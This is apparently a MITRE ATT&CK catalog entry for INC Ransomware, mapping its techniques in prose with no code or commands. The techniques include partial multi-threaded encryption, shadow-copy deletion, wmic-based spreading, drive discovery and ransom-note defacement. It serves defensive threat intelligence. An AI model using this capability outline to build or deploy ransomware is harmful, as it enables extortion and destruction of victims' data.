INC Ransomware

INC Ransomware is a ransomware strain that has been used by the INC Ransom group since at least 2023 against multiple industry sectors worldwide. INC Ransomware can employ partial encryption combined with multi-threading to speed encryption.[1][2][3]

ID: S1139
Type: MALWARE
Platforms: Windows
Contributors: Matt Anderson, @‌nosecurething, Huntress
Version: 1.0
Created: 06 June 2024
Last Modified: 28 October 2024

Techniques Used

Domain ID Name Use
Enterprise T1486 Data Encrypted for Impact

INC Ransomware can encrypt data on victim systems, including through the use of partial encryption and multi-threading to speed encryption.[1][2][4][5][1]

Enterprise T1491 .001 Defacement: Internal Defacement

INC Ransomware has the ability to change the background wallpaper image to display the ransom note.[4][3]

Enterprise T1140 Deobfuscate/Decode Files or Information

INC Ransomware can run CryptStringToBinaryA to decrypt base64 content containing its ransom note.[4]

Enterprise T1652 Device Driver Discovery

INC Ransomware can verify the presence of specific drivers on compromised hosts including Microsoft Print to PDF and Microsoft XPS Document Writer.[4]

Enterprise T1083 File and Directory Discovery

INC Ransomware can receive command line arguments to encrypt specific files and directories.[4][1]

Enterprise T1490 Inhibit System Recovery

INC Ransomware can delete volume shadow copy backups from victim machines.[4]

Enterprise T1570 Lateral Tool Transfer

INC Ransomware can push its encryption executable to multiple endpoints within compromised infrastructure.[2]

Enterprise T1106 Native API

INC Ransomware can use the API DeviceIoControl to resize the allocated space for and cause the deletion of volume shadow copy snapshots.[4]

Enterprise T1135 Network Share Discovery

INC Ransomware has the ability to check for shared network drives to encrypt.[4]

Enterprise T1120 Peripheral Device Discovery

INC Ransomware can identify external USB and hard drives for encryption and printers to print ransom notes.[4]

Enterprise T1566 Phishing

INC Ransomware campaigns have used spearphishing emails for initial access.[1]

Enterprise T1057 Process Discovery

INC Ransomware can use the Microsoft Win32 Restart Manager to kill processes with a specific handle or that are accessing resources it wants to encrypt.[4]

Enterprise T1489 Service Stop

INC Ransomware can issue a command to kill a process on compromised hosts.[4]

Enterprise T1082 System Information Discovery

INC Ransomware can discover and mount hidden drives to encrypt them.[4]

Enterprise T1047 Windows Management Instrumentation

INC Ransomware has the ability to use wmic.exe to spread to multiple endpoints within a compromised environment.[2][3]

Groups That Use This Software

ID Name References
G1032 INC Ransom

[4][3]

References